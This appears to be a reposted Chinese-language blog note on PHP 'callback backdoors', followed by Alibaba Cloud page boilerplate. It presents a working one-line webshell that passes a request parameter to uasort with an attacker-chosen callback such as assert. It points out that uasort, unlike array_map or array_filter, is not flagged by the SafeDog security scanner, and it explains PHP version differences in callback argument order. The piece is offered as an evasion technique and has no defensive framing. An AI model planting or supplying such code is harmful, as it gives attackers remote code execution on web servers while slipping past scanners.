PHP 回調後門筆記

來源:互聯網
上載者:User

標籤:回調後門

在php中 存在回呼函數參數的函數,都有可能作為後門


比如array_map , array_filter 這類數組操作的回呼函數,但是在安全狗下會被殺掉


但是uasort 這類函數不會被殺掉。


php5.4.8之後的assert

在5.4.8之後,assert函數由一個參數,變成了兩個參數。增加了一個選擇性參數descrition:


5.4.8增加了參數 description。 description 現在也作為第四個參數提供給 ASSERT_CALLBACK 模式裡的回呼函數。

那麼這裡就可以使用有兩個參數的回呼函數了,比如

<?php$e = $_REQUEST[‘e‘];$arr = array($_REQUEST[‘pass‘] , ‘te‘);uasort($arr , $e);

在php5.3環境下會報錯,因為5.3的assert只有一個參數。

在php5.4以後就可以執行了


這裡的傳遞參數的順序也有變化,在php7之前不包括PHP7 , 傳遞參數是array的第一個參數就是回呼函數的第二個參數。

在php7及以後,array的第一個參數是回呼函數的第一個參數。

比如:

function mysort($var_1 , $var_2){echo "var_1 : ".$var_1."<br>";echo "var_2 : ".$var_2."<br>";}$arr = array("1" , "2");uasort($arr , ‘mysort‘);

在php7以前的環境輸出:

var_1 : 2
var_2 : 1


在php7及其以後的環境輸出:

var_1 : 1
var_2 : 2

PHP 回調後門筆記

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.